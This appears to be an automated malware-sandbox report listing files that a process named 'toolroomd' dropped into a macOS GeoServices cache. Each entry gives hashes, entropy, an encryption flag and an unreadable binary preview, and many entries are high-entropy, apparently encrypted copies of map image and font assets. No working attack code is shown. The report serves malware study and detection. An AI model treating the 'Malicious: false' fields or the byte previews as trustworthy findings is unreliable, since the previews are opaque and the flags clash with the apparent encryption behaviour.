SHA-512:	D215CE168FE4E578BE52C0491271E1251518748742524425ECE6B7227F00C1D48E5EB961F7934C9C35BEC30403577F02DA9337B8A6C8B69A115DE570DD817BA9
Malicious:	false
Preview:	.bn.\.L3+3...!t._:...9iU...H./I..V.2.>.....0...&. .v.J...1.\|.d.a.....F...mZ"..GrLx..,h...\|..&.z.E^...Mf.....xc.&...q...p.. ..4.A_\|..~?......R.........x.X}..;h;...@;...+......(....m.r.....i...d..T..o..,e3.x..66.....fuP...q..6<.."a..6<.."a....m..9...S.<.....[..U.6<.."a...';\..r....c..kU.7....i2A.,...[.2)v....o.VlB2.....[....~.1..f.....c..kU.i+.0..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..?.zP.:..a{..../U}.Mp=..cKl\.nf.6<.."a..6<.."a..6<.."a....`...F.H...&.c.z..J..+.w.>PC++_.K.~=!.....iFx...e../....XOU~.<... .G..tqm...Q/.V....5k2...X>K..2dG...B......$.{ ..L.,...K'J...4.....w.].).y.n.c...V'..H....u.>.1....=....u.+..Z.....&...S..A.....v.C.,.L7..i..T.1o.s.).S.;a..t.!.rBtc..7a9.t.s..vM3.7.LM...i.k....T..z2..#....`.'F.f..i..u...+.....MD=R.C.H.M...\|....xr...0.Q...^..2D$."71._..K.w.d......=R.C.H.M.J.hM.'...b.ho& .._-.f.Xm.............-3....=R.C.H.M.Q..,. .......K.%\..\|e^...^...jM....n.Z.6<.."a..F..18&Z*.LI.[<...7..(0K.....qu.~.3..

/Users/berri/Library/Caches/GeoServices/Resources/.SFShieldsSemicondensed-Bold-1.otf.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	18195
Entropy (8bit):	7.9242498223736515
Encrypted:	false
SSDEEP:	384:BmoINyPdAnIro+SLqv2SOrdakjzVXyMTBa2z18Q7iBvtynJe2:mNLnd+SLqv2JNVXyMTB/1gyJe2
MD5:	83A07E970EDEFFD0E1FF3ECC67146BAA
SHA1:	E6F975660AF5DBE2A6B49F67591D230BAE2FE729
SHA-256:	A8A58C0D3E13F3575B052AF7EEF42C931CD42229A085959D1F8230E7B3E8926A
SHA-512:	9C4CF6C4C16C39EDC39F1192933B6CEAF7602E6BB1328EC79DB105CAC4825835213D08D18AF562F90A91C334160208E336B68A699C225335B099850C8ADA6D6D
Malicious:	false
Preview:	.bn.\.L3+3...!t..?#.jR..w..}G ..>.6@.R6....0...&. .v.J...1...0...h...F...mZ"..GrLx..,h...\|..&.z.E^...MfM..d..L.&...q.....2...yA_\|..~?..Iy...>........x.X}..;h;...@;..u...vqv..x_.....}.]...A.P........T.x..).x..66.....fui\K...6<.."a..6<.."a....m..9j.47..{...Z$..6<.."a...';\..r....c..kU...&f..A.,...[.2)v....5..l..kA2.&..v..~.1..f.....c..kU.i+.0..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..F..c...a{..../U}.Mp=..p.......6<.."a..6<.."a..6<.."a....`...F.H...&.c.z..J.....Y..F++_.K.~=!.....iFx...e../....XOU~.<... .G..tqm...Q/.V....5k2...X>K..2dG...B......$.{ ..L.,...K'J...4.....w.].).y.n.c...V'..H....u.>.1....=....u.+..Z.....&...S..A.....v.C.,.L7..i..T.1o.s.).S.;a..t.!.rBtc..7a9.t.s..vM3.7.LM...i.k....T..z2..#....`.'F.f..i..u...+.....MD=R.C.H.M...*\|....xr...0.Q...^..2D$."71._..K.w.d......=R.C.H.M.J.hM.'...b.ho& .._-.f.Xm.............-3....=R.C.H.M.Q..,. .......K.%\..\|e^...^...jM)..`...66<.."a..AMoOk<UV...!..E.....B=F>J..e......=P.1..

/Users/berri/Library/Caches/GeoServices/Resources/.altitude-827.xml.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	152243
Entropy (8bit):	7.959195876916204
Encrypted:	false
SSDEEP:	3072:a9x+UPn3X5GaBJMI9R+oBw/ObZ39sHQSo/meZOLziVNqYSRS96MPeSlW/3hCR:a6ATEOaJ3EtW/y
MD5:	C58284DFE698E1628B7958DD0F3322B6
SHA1:	BB6DC7FDC58E89A05883F715926E56C0FD3B0B30
SHA-256:	A9CD9B04D132A49239C1802FA490A2BEF163C50590C07575E1DA80E797A1F2FD
SHA-512:	6EB6462FD12AE3BE7A647919359A5B65D4395499F3CEB93DC2FB114E655BE7D47EFC74D24610C5155031389FAF1B35147D917FBC2CE756309DEB53215A61DEA3
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`.\"...=....p..<j^X#.._)<s.r.!..&mzo..Y.......m.7~g..[.FW,.Q!nA.xQ\|.yxL@6.....!.bl.C..-O....S9E....s...y.:..7....jK.r.lB=...c.u......9YP..{C...F..."0.2.....#...!..1:..].d.;.."A.z.....q.m\.E2....jK.r..B.R.>.6.....!.bl.C..-..e......k.P}_.A~._...7+..NlF;x.....F.I.R..P\..I.a...h.....f.rD.g..iC.6.....!.bl.C..-.+..+...Z.#..1....jK.r..B.R.>.6.....!.bl.C..-O....S9E....s.....#CP.Gj.........eg<1Q[E~gk..LY.].J..LS.?Z.l.9A.ck..Wz.~.o.):.r..Um.:..cr..+A.5..p,.."E......(f+$.............;...%..eE....>z..,x...eR.t.......'...BxI...??...h.9..h..0h...:.z;Q..a.:l.F.K\|:..}.]....wn.6.....!..\|...o.{.k;...k\|..2...G..{.J...4..uf....v.[.i......WI'..e..+..B..R...3..5..(._..7..,....~.%y..g..3.I...kgCd>.*...zE~gk.....@.5.z.~.o.):.r..Um.:..cr..+A.5..p,.."E......(f+$.............;...%..eE....L..S...lj.p.d.p.7..~....BxI...??...h.9%u.........:.z;Q..a.:l.F...8J.]....wn.6.....!..\|...o.{.k;...k\|..2...G.V.1g.?.{......[c.O.F......8..He.$9..k.._j4..

/Users/berri/Library/Caches/GeoServices/Resources/.cemetery-15.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33780
Entropy (8bit):	7.991095964663626
Encrypted:	true
SSDEEP:	768:cYq2AdXjgBDsdobS/7D97P++6tdoUDKt55h2qG8Soe3UljjH2qrP:S20geecNP+Lxi5h29RohWOP
MD5:	709E2024B4BA5586AB092B6FFB41C7D5
SHA1:	787983F451DA0D06D8AE94BE0C3A0F24BA3B2F50
SHA-256:	7329771F26DE79AF3CD32F0000EB6F43FC429C4C61076DA3B0F67F1782DF9965
SHA-512:	8E33D4EDE839715A276C080385216099FDE1B1FFB3E37A6313521C2966DE96DE88178F016ED9FEDEA3928DC16EA6F7E91CCF1C316DBF35C66E1156EAB72B88B2
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f.h(.mp....n.....i..y:..KA...'s.h....Zg..m.Rx........GH.8....F..l...J..E'-.t...~.~NJYt....I.K.9..R@.......o7\|...).p.0..O..M.....j..Y....=.T..P...S.}q........E.;.. ;W2..x.....P`=.-.P....dh.U.%.z.....w.y...m.2.r9....+`.\|(.Qp.....-.......=...g._.......e..%Z...v.-?9..UQ...{j.G..B..+.t-.......E.wIV{;......M&.y.I4...........).!M..n$...t.h...}.}l..M.......X;}d#M}_.w...\|.0.."......;...<u.D.0...A!...h.UH.45..'._".4.,."...S...G.#...%.1kf... .{G....+..P.y...G.6J.Fg.[.....C0.Ou.....>.Q...H...........).i......=~...]J..'z.X...k.......tK0ci.."..ss/.G...=4/hd...&y~.i..:..d..Q+.....t..u..i.9.(Y..ql.=...y....g..;m.y..........c#...c...../!..o_Y.8......F..7.T...y....H4.....u....Zg A..IC8].~=.14IW....b....d..7......>..>..b..fV.Jh...<Y..)...%K&5..8..W.W....D..D..o....$.~j.N j.M...v..u....Z....nT.....P. ..?.7..B.Ro..@e..-kb.......5W..( ...^Q.0..#.S...ZS.d..M.....F....iy..=..1.SW..1 SZB.

/Users/berri/Library/Caches/GeoServices/Resources/.cemetery-15@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	71558
Entropy (8bit):	7.996650998493596
Encrypted:	true
SSDEEP:	1536:CFeZ0gfr36UVSeR+0hUwpSPqSCJe4v7FmsI5s17L1:CFe++36OBUtSSge4pmV4x
MD5:	0269C87A95CF267EB7D2DD2EC4116881
SHA1:	43F0CFEB296434D519F556FC51DF5FFBB3EB527C
SHA-256:	89261221297489492AA516511ED0024077E2A0B25057E0F8115C4FB508290E9B
SHA-512:	584B351EE64A3B4803213035EA475A87396ACF713E28A34B780E58E55BBCD7F47922D059D6A2DFE81D92F87BED89560D137473473B01898CB1A8BA5971537CAF
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...^...kG.y.......w....q..57.} .}.e]rh}L..`......O..._.v.3.t_.$R.....u.......[KJ\|6_..Z.o{..ck.D.D..A..tG..Z@%...x9bk....._w._J..id...y..}C.A......8q.`(..X.r..T......_.~..Fp..V8ea.R ...w..~./...'M(.................[.[5..!.....~0..>...@...n.Nq..t.1j.T.,4$Zs...T.../C..D&.V...q...g...u}'....b.B..x..&...=../..r...1$..............;...P%..SR.$@..9..i.,..Yl)l.,...m..(q.....nF..-8.%.N..yF...G...!...%.".... x.b....Z....K I6....../o\|.p...;...o..m....:.rZ..~..v...3...S...dqZ1./X^tV@sc.ft(H.X..4...m'...6.Z.=.......s..}.h..d.Mr..F....B...D...Mb~..y+-..}...&...\t..<).M.]z.%6.X....A.D.C........I[......AQ..1...^....{._D#.>G.z..............]f0W.t.AX..A..V.$...}..P*.8.=..\BN!.........d$1..\|..........(.?d.8..C..i$.m....9j./.5.T./3......'...U......t.~...i..8.XM."c5.}.c.E.....ux\Eb.p^(V.##QM.M(...o.R......0....L..2.....);.,.m.L....:........H.K95...d.}'..../>.P.........KWZ(.KK.....S

/Users/berri/Library/Caches/GeoServices/Resources/.clut-night-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	9578
Entropy (8bit):	7.9555555735937915
Encrypted:	false
SSDEEP:	192:2kjc9/R9H2GJMx8IVHl73La1imWxSXDaUXcfG0LLp6lyQ8KspurT:xc9/6j7321i/oa9XL1641K08
MD5:	536302C51D66209F90D4D0AB9E3E573A
SHA1:	8F96737BEA5429B6BF2AC8AD12FF436A2A05C2A5
SHA-256:	B4A81577267B1EB96A12760EA9812B8C4554A51790977145AB52C21FA840C34F
SHA-512:	EFEC161F9B6F0027AE73260C620EAD04F24EBB3C1CEAF64A4556493AFF30176E6806C6D158842C327DD0EC563889AAD4CB862AB30AF97B6DAC9A8B9BCB0848E0
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..%.[.C.=.?...>.l.`\...7Z.....A.8ug.....-..d>&..y/r.....r..Nz...1-......,.Ye)_......):.8.2..b.4M}......A.......r....5t..6.5.....I.xx$..]...;<`.......1nO.......... ..Y..#....A).)'.5....Yu.O.).).>..d...>.......O..k/\3.%.n.'=...P..@Yl...j.e..E75G...<.8zTT.....m.T>G.T+.....yMM?..TQ.{/"..7yG.IMC.9^......Mz..W..4=..d+.y.rG.Y.&mp.d:. .JQ......Q.T..]O..:...{.!....A...........1Dg....x..di..>..S"C?.X.K5...7..{...Y=6....@,$.[....B{..x.....x.I[0......6.s..Kr.)1aYY..X...?c.A.....(.........Mc...V........"UQ...d...1..2y..;!..O.....H.J".....A.k...m..l..7D.E.o...$\........].q....Ykv....tv...j#''jYu.....`.....'....zVyF...m%.....N..\..z.O.jx..TMC........HF...h19...]T.S.5#....._..C..SI.1g.....`.:..Ai..:..QG.}.\|..hT(~.:{...D..71].F1/~........w.X.].r.....EJd......}.....V.\......2.....Z~o..mi.9.K.W.N....:......-_...(.:.nl....C...*..o...:j..4:w..8.K....k.k...2...3.....}9ib..XHm.:..p....jlH.u...w..}..a.L.f...D.Qn...#.D-B

/Users/berri/Library/Caches/GeoServices/Resources/.concrete-17.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	25355
Entropy (8bit):	7.988023067252759
Encrypted:	false
SSDEEP:	768:7TXmriICkmZ+G8xVcO+EgVGiLaHwIV643Ed5B:7+c+Vc7jQiLaQi0bB
MD5:	181B176976502B67D510262C37FE383F
SHA1:	79CAD024DB92DA215E2617389957D8414FCCC643
SHA-256:	1AB5BC5DAF5C362E01207C614AE3B4D7E526A9178C39BD7B3F27D845B1846B8A
SHA-512:	98CE651C690FFC7D64CE0B46212AECA6B438DB3C71FB91009D5137F6844D628BC13B42D45C11886FFFA8C58234107068D0F3372B5BEDC54AD2F1E07D0C0822E4
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f...~I.Y...."c(.......I..z...H?.zFz../........tm....A...8@..@..t..o_...z2........6......N..~".p..$.`a.B..-.q.nJ...0@'..BM......\.w.G...o...rRI<..M..8"e..@...._....}.KX..].Fj.......;.^\.....+.....(M.v..24.ryx'..G.....?M$~.......%D..P...G.} d.7...BE...0S...e....x..mtc.t...3...\|H.)......q.L.RBN/].F..%A.J..... .e..z%mJb._{...-;A?........L.#.i...)...Q.p....YD,BQ...\".?.Mc......Fjl.Uf........H..}]..........I....b..A......j.v.X.v.?..Ce..S.M.Q..).`;`).._._.cl..+\|at..{.F....;..r...2=.Z'.D.._.A..w......4.{c...{.3Sk..].6.......b.S(!......wL.......P..h.F....].u.w7z...[n.Nkd4R..X.Gf%..L.n...O...EN.<...k.....G<....^.,...T...L......g..... .../..)nt.(.Z)t..6l..........Bc.M4.;M.>....&?..6........`y.B"N..v..n.?....3n...BK...A7lA.........{4...s..;.K..%4.R...&.~.`.....13."P.[..(`G......2KKu...g.]....e.j.`.6.X..5..0..,r.....P)8..P...m.'dY9.....v..-.0..pX'.Lg.H....[..MW.4a...{..5...V..b

/Users/berri/Library/Caches/GeoServices/Resources/.concrete-17@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	91711
Entropy (8bit):	7.997547899340051
Encrypted:	true
SSDEEP:	1536:PPCZmrbTcdvOdTYng8MkwQAxrPRU2FrCIzobkSah9eETZMqAhALKPF3PgXBHE0:PnvKRg8MxQAh5JHSxc1AOKQBF
MD5:	51D64726D8F944204F34AB2149B09211
SHA1:	3DCC4E25EF7DD0FEB9E1032E5CCB2418A231C219
SHA-256:	D5E940480CD87D1DB69317E78641B3EB2390409BBFFC26FBFD0EB4940963FB10
SHA-512:	3E819B3AAED26CEFCFA67F8C57BFFCBBEC300A26F52008B42E7A1A1FA70A47E9107A9F1F17DCF32C5FB158AD1B9F09DD6A0D478E8D4758292A2EC44803CCA6F8
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3.........K.p......I..T&I...Q\|..j:&.u..F.8..a&A..k..u'..r.PF.._....w....4y.6.:;p..z..Q,G/..u/.....<.P...v1...........v.}........!{.$,.....#a..uL .y....Z.6.x.n...]..e.=.L...E#.z../V...Q(.(..%i..ou.4vD.+.M.P..../.........\|.Q[.... .l......^..y.f.....'.u.....@J.)"..jT$.7.~...}...q...2...........{...l.q..\|.&....Z.2."..UUb..^..-\.....s,9...0.K3U]l;.M.5.\.:.Q................X....X......gj.pdc.....0y......%....J.IE....7.R4...."G.........Q..,...FX}......h(.-.=.1.s..s..>f.3a..(~:P...D:S..}i.z.X....i ..<.........[/Q.....r..c.e...m...C....%&K.%....0....8ij=......b..).....71..Ec.J.a.......!.K..X...R)./..F....oh.y..7..#.C@:...c&p...k.G..M.W.M...".,5..v....3..M.T.....Z...*....N..3]`/,.`c...K..6...\|1...xA8.T.9..,..5..y.@z...~ ....c..+....$7.....E..I.#..`......"...r%.I...L...P.V.+.W(....F.+U...s...(..r.a..U..u.w..w k.....~..f 3.c.<....1..iv..V.AF..IM-..e:...(@..+.i...1...0...z.Q

/Users/berri/Library/Caches/GeoServices/Resources/.golf_course-15.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	34324
Entropy (8bit):	7.992036139389758
Encrypted:	true
SSDEEP:	768:fVj81yDqp54ZaxqQ2V2MASmJCyZo3EBCjs/LegPoF:J81ympzxqwqmJCyZo0BNPW
MD5:	33A61744DB368DF3873780076554C126
SHA1:	3F01AFD292B911CC9007B968E2EDC39E39FE9BAB
SHA-256:	646FACD04E31B2DCAFA1CC337E2C83F5A1A2B35A0AF49D39C30B1CC3A46A22A0
SHA-512:	AD33994E0EBD9A45DE9A3FDEA762B1508C3EEB1A5586705BF896556AE70CA7CC365ADF2969C4FE920F8C7541804AE014FADBDEFE85794462FA0026480A964B5D
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f.....<.m...`8S.....&....5.8.!.......2S.`...!..+....T..ve....Z.X.p..Z-...uJ..E....#A.Q.G..6.~.x......2...(.tz...<.......J.9^...8...{...G)...3Hr._........M....4.r...@..egRKy..DGG..Iu.3...........]t..S.$..m..J....p.......j.A..q.....?b......F.x)w..(@.yC.l8...$.~I.s.{N...t.ik......v.....DY......O.`l..@...6U......U.0b!Z.d.%........H"....U..I.......j.,.@..%..`.....+..7vY..^^w.;.]..m.8.t:\......l%..+...+.= .UJ...!7.j-.....5?.e...I.#..8....\H...E............p.....k.....>.'\|.q60..-...@.&L.;S.v..o.T.c.4.Vw..........X.A<.d...OY.E3..tp...........S...g.$...k..(s.ULm.w..2.n.Gx......\|..q..v1;.n.iR0../.D...Od'.K..>8..ID.....F"+.D......Je..,.ni.K:...DY[~y..:.....Fy...J.........!\....H..<.....P.EI..f.c.#.t..%#Yn.0.6...x.e.M:..........F....F{)..L..L.6..zj...KZ].....QF...un...JJre8......:?..Hc....s...%...jJB/..}..$C.......iS.......X.$....-\|.@.+......]...H...'.)......-y/....k

/Users/berri/Library/Caches/GeoServices/Resources/.golf_course-15@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	73198
Entropy (8bit):	7.99665867163451
Encrypted:	true
SSDEEP:	1536:+GjKDZdFZZRe9XcuSzmAQGrur+msCj7wnBoN21+75HA0t:+GsDZZRXuIQwur+msK7wncuQ5HA0t
MD5:	245F70FB47CEED5DFCD80CC9355C18EF
SHA1:	E3CD6028EDBDF4B4D733097F5C2C34157F72649C
SHA-256:	77A8CDC4C31FCDB73BEF86D53C2298E48442DBD3A08F995707207DC9ECC095F9
SHA-512:	7C17DBF3F3E40DA42E3A3406EA2137E46A2A9F8089CA393E20A115CD23AD0929B2D84412CA015B301399B4EB235E3E33CCFAB84FAAE390E1FFB4CCBC5E5521DF
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3....j..x..H4.7Z.s[r.~..]...0..........v.M...CF...U....*........n~.Kk.gC.....:"k...8O}......2.$#Z5%...\|......1....o....wCv.&d.u.......P8..N=...I.T..u.....:...@..79..}....H.e .eWH....u3..5'A..F."3P@..^.._.b.".Po.P..N.d..4\|q..4N....Z!..M.......ih.e..T..Xv.J.n..j.FY....&.......!...fM+..?a.#.6.....a.........R..=3.H...I......L...O.`S.6.qS...iFCC9....'[z..`..=......o.~..f...%6oWr.%.ON..h......1^P=..C......<..V.!\FIbA.65..](..,n.A.....)u..aW]....j....~H.K..>'..R..h...y ..6J........U..v3;....6.....ug(&c0..N....q.....W.:..'B..t...=...;$...?......0.K......O1._{.D.`..`.'...8.B.\|.i._M.iL..9...........%.)...4-].f.TDX..c....5..\|.2...+..<N..(...tV...z..qI..k.RgQH......)tzkqK.?....._..>I...1&a.....A..f..P.Fj?\|.=.VP...U.K..3.v.8jp.M.~.k.:..KD.k6{..?....\|j.ptI..W.......\...j]Xf..J...6..q.....2...D.w9.\|..S;[.p..K?/.R.1u.."v.E.'..O..pM.d.S..}Y+.x.NB..@......,.._....%.....M%...

/Users/berri/Library/Caches/GeoServices/Resources/.land-18.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	698
Entropy (8bit):	6.6117213383140685
Encrypted:	false
SSDEEP:	12:WP+kRJtJu7dfB6mTuW3jIaD6WfB7HTuiz7PhGsewLYTc+qGm7:oxJtGfBd3TIa2WfB31IsePc0m7
MD5:	5BEB61DD6D07F493090B1BC9A8E818DE
SHA1:	3A8692A5BEA6E301BFA28FD46FCE006FAE2A599A
SHA-256:	C2202B22C9C68D56468FF73F1E8C3128637EEE844A06A7EF9A686F26A3E55541
SHA-512:	E7FD0960E2A8D75290150480D2C5A66A2018B2FDBBF4AB02F5D7584CF65F0AA41A060BD7D38C78179EE95B046E3E0424922927DB7AAFDBF67731A19E363EE7FF
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f.{...T.....;...N..@..Ok......H.A..d..Q..2...(C]VC...;B.......z.0K...C...D.....=..L.6j&x.l$Il.oW...v.._.^:.`...2.(.;........e....l\|{..C..,..!.C.m..@..2..R.q.QFp_%.2w..3#....UCQ.^c.p.@....,...].I.S8.C]VC...;B.......z.0K...C...D.....=..L.6....E....oW...v.._.^:.`...2.(.;.......~n...q..[.P.".....Pt.5...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.land-19@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	6.792837131172093
Encrypted:	false
SSDEEP:	24:oueOJJSx12xjsMjFbjmzJmjFbjyzMjHNLsePc0m7:rDrSx+jsMjFjMmjFjyzMjlNpq
MD5:	399E88845F31AA0B4D37933EFB51BB2C
SHA1:	23B61380D94FB8964D8FD330142EBA307F789A0B
SHA-256:	C9994358C49F6C5611C682C7E66A1D89ECA877716B722AF329757236BC57AD2A
SHA-512:	18C5A92815FB87BBAB8048681AB66E30D648171E705DF5856A72131D73286AB93BBECA6D35B61E7923D6B5D90B1DAC556F0DC3152F0354B9A1FBB4E65915541A
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...Q.6K.....!.3....Kl..L:.:M...4.8B...T..}z`AI....:..b.s..$.{4ul..l..k.m.....e..v.b....\d..h&....vZ...g...I."R.f......>...e..v.b....\d..h&....vZ...g...I."R.f.....:..b.s..$.{4ul..l..k.m.....e..v.b.Q%.........:..b.s..$.{4ul..l..k.m...Hm>&;.Y....\d..h&....vZ...g...I."R.f...Z.['...}.........\d..h&....vZ...g.............9.Y...w....x.-....v..y.S...B.S.u\|...e..v.b....\d..h&....vZ...g...I."R.f.....:..b.s..$.{4ul..l..k.m.....e..v.b.Q%.........:..b.s..$.{4ul..l..k.m.....e..v.b.x..P...h&....vZ...g...I."R.f......>...e..v.b....\d..h&....vZ...g...I."R.f.....:..b.s..$.{4ul..l..k.m.....e..v.b..d}1.......:..b.s..$.{4ul..l.t...A...a(?Kc....S..._......[....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.land-carplay-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	610
Entropy (8bit):	6.319023764643831
Encrypted:	false
SSDEEP:	12:WYZ0fMHdl1q2Yfttr1q2YftjcgO3/sewLYTc+qGm7:+0HL1Hi11Hijm3/sePc0m7
MD5:	3F6C96C1B04127DBE34E736888DA81BA
SHA1:	A2CE40B2628119C072D00600F723F304F5187277
SHA-256:	C0192918BCBBFA92ACAF46E43F5BB6070AA94C32CFAC512DFFF282C6D5156E9F
SHA-512:	306EA5F261869E00ABF655AB2B56DB017AD9081398178BD6950C66CC72D3346EB9F9757B84FB865DEEAAA86A2D3D36FA881A3CBFC8B17F7415A2BCBB988A7818
Malicious:	false
Preview:	.<.\|.....f.A..>..D.....XRM...&..& ."..h.).6...6.e..4......h)..1..cG\|..pI.....-T....gH.........7..Zn......`$JAmS.\|9...'U......(......t.n.. .lvO..we..\.7...............Y.K..-.%.B.>.mS.\|9...'U......(......t.n.. .lvO..we..\.7...............Y.K......p.......9..8[........3X...S..._.M.h.J...1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.land-carplay-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	922
Entropy (8bit):	6.816086172014874
Encrypted:	false
SSDEEP:	24:r5e5GEBFVIR8kcVImozCGXFVIRmcsePc0m7:ro5pnnIzC0TcNpq
MD5:	9470DA34699998ABBCBEC317B882702A
SHA1:	854ED69E3ACB8BAD670FF7587C77DBC82777C163
SHA-256:	1E55AE725BD0AEEDE0AFB1F0407FD3E02BF1ADCD2880139E5D4B5BD6E807ECA2
SHA-512:	31533C2E4C3B1C6467F14990B7B7D23B9AEDE699D668BB96D78FE25CD0C3C064145C15EEE4750AAFC962BCF93F082A515AA7209BAB740E5761ED4895B077BFB8
Malicious:	false
Preview:	.<.\|.....f.A..vM..j..<".q..o........"..h.).6...6.e..4......h)..1..c+....Y.u..%.[..x.W.#........)d.u..U[[.B.....&9'.i.....T...I>........r.Q!a...g...O....@..B.E,......,@.%)..F.J.rp...PY...F........g...O....@..B.E,......,@.%)..F.J.rp...PY...Fj.k..T....C.H..m.[..X..y.<...Y.B.....&...H......PY...Fj.k..T....C.H..mp.4....].y.<...Y.B.....&9'.i.....T...I>........r.Q!a...g...O...v.. .B.....&9'.i.....T...I>........r.Q!a...g...O....@..B.E,......,@.%)..F.J.rp...PY...F...Pb..v...g...O....@..B.E,......,@.%)..F.J.rp...PY...Fj.k..T....C.H..m.[..X..y.<...Y..9..cf.#.V....hgL...Q.Z7.E\.:I."R.f..i.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverPavedArea-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	20347
Entropy (8bit):	7.985901625588114
Encrypted:	false
SSDEEP:	384:mPrAAKOgtCI4ovtEDOJBvYa8YjzeaROhpUhzhE1sjz1:8r/KBktoqDQDdzROhpUhzhksjz1
MD5:	4D5A1540997D7CE6BB3BE277D36F558A
SHA1:	66D4B51A0A4DB0DED09BB1B885487408DEA7E283
SHA-256:	11A4B96EB8BDBB7A4CA9E364E24A290177DA7C1CB854801192A85696009C56CC
SHA-512:	B97F251C634A3529E39BB448E638325CA9E1E2C879866EFC5C7B52BFB64743A8DE15E13EAD5C2F78B4B637071532D1EDEA80EC668667474F508217124992E6D5
Malicious:	false
Preview:	.<.\|.....f.A..>..D.....XRM...&..& ."..h.).6...6.e..4......h)..1...);..B.t.^.......;.nl....>.......^e.....&.a1rc.. T.......]....l../#;Q..)(kY..."wR.g.3!..m#.0..s............S./.XW........q.........d..........b.....U)Bb......ib2m.M.>.]DH.:D.@.W.F..q...@>1.i.E.N....wsc.D...[...z.E+......K....aK..9.0.Y.w7..W.....W..F.....Nv...a..Yj.Jh...S...h.}AM...1..[..@..\'^.H.....n..Xm<......#t...FY.".B....>d&".....I5.;./.g...Fg.j.G....."..0......U...g.9~.~b.......1 .j....T..r%\...{....J......m.hW..S.......)...n.}.].....D..l..:..wa..@:q1k..m......s...I?T<...f...1.T...Xx.J$#..{..^k.?.....EC...8=.I....U"U...9'"....7...#..p...$.N.}.....n.f.".x...D 9...a..Y.b:I..I.<.g.....'...`..vz.[.....K)E.3.7x...=.B....$.8"_.~...j:..5XV.be.V_..?.p.].c9...J?.....\|..Wn........".m-.........e.=L.K/.y.p.R.H{P..u..K.}d.&.A.x..Eg...h)....4..!..-1.0:.ad)..z...Y...v%..6........v;...K.....*..f.y4. .Psf.r-5.M...9....N....e.e.3.".../...Y....\|..`.... {......k....

/Users/berri/Library/Caches/GeoServices/Resources/.night-DetailedLandCoverPavedArea-2@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	90199
Entropy (8bit):	7.997586830248946
Encrypted:	true
SSDEEP:	1536:6JUb9PAAYQmeTOwBHaA7TdxjFKMN71d+oHq5igxbvCvuywInWP8LfEbbzM+9hp7L:8IPKvi6+lj7epvwu4c8TEvtL
MD5:	558770DCD5A71477BFC1FE492A946984
SHA1:	6E90FC4F0A32CA0E566D3DB05851F98ABB02222C
SHA-256:	9E06374D8AA5F8EBCB4B117A1867E32B40D6EC704E2D9CF1389FFD2E3027BE69
SHA-512:	CEBCA11B3A81942A28B32B340D494826BAA0C205AD93DC9C907F440235C7C1F513539FCE069148D906CE88D0F5BD6253DE3A13033EE03A9EE1F320045F830572
Malicious:	false
